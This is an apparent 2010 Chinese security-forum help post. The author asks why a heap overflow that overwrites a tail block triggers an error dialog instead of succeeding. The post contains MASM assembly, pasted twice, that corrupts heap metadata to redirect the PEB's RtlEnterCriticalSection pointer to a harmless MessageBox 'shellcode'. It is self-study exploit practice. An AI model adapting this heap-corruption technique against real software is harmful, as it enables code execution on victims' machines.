-
-
[求助]修改了尾块但是不能成功溢出,而是弹错误对话框,何解?
-
发表于: 2010-3-1 13:07
-
.386
.model flat, stdcall ;32 bit memory model
option casemap :none ;case sensitive
include heapoverflow.inc
.data
heap dd ?
h1 dd ?
h2 dd ?
myaddr dd ? ;保存正常的ntdll.RtlEnterCriticalSection地址
.code
myShellcode proc?
assume fs:nothing
mov eax,fs:[030h]
add eax,020h
mov ebx,myaddr ;这里修复正常的指针
mov [eax],ebx
invoke MessageBox,0,0,0,MB_OK
ret
myShellcode endp
start:
invoke HeapCreate,HEAP_NO_SERIALIZE,01000h,0
mov heap,eax
invoke HeapAlloc,heap,HEAP_NO_SERIALIZE,016h
mov h1,eax
mov edi,eax
add edi,32
mov [edi],offset myShellcode
;int 3
add edi,4
assume fs:nothing
mov eax,fs:[030h]
add eax,020h ;eax是地址
mov ebx,[eax] ;ebx是指针值
mov myaddr,ebx
mov [edi],eax
invoke HeapAlloc,heap,HEAP_NO_SERIALIZE,0120h
mov h2,eax
invoke ExitProcess,0
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke InitCommonControls
invoke DialogBoxParam,hInstance,IDD_DIALOG1,NULL,addr DlgProc,NULL
invoke ExitProcess,0
;########################################################################
DlgProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
mov eax,uMsg
.if eax==WM_INITDIALOG
.elseif eax==WM_COMMAND
.elseif eax==WM_CLOSE
invoke EndDialog,hWnd,0
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
DlgProc endp
end start
.model flat, stdcall ;32 bit memory model
option casemap :none ;case sensitive
include heapoverflow.inc
.data
heap dd ?
h1 dd ?
h2 dd ?
myaddr dd ? ;保存正常的ntdll.RtlEnterCriticalSection地址
.code
myShellcode proc?
assume fs:nothing
mov eax,fs:[030h]
add eax,020h
mov ebx,myaddr ;这里修复正常的指针
mov [eax],ebx
invoke MessageBox,0,0,0,MB_OK
ret
myShellcode endp
start:
invoke HeapCreate,HEAP_NO_SERIALIZE,01000h,0
mov heap,eax
invoke HeapAlloc,heap,HEAP_NO_SERIALIZE,016h
mov h1,eax
mov edi,eax
add edi,32
mov [edi],offset myShellcode
;int 3
add edi,4
assume fs:nothing
mov eax,fs:[030h]
add eax,020h ;eax是地址
mov ebx,[eax] ;ebx是指针值
mov myaddr,ebx
mov [edi],eax
invoke HeapAlloc,heap,HEAP_NO_SERIALIZE,0120h
mov h2,eax
invoke ExitProcess,0
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke InitCommonControls
invoke DialogBoxParam,hInstance,IDD_DIALOG1,NULL,addr DlgProc,NULL
invoke ExitProcess,0
;########################################################################
DlgProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
mov eax,uMsg
.if eax==WM_INITDIALOG
.elseif eax==WM_COMMAND
.elseif eax==WM_CLOSE
invoke EndDialog,hWnd,0
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
DlgProc endp
end start
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
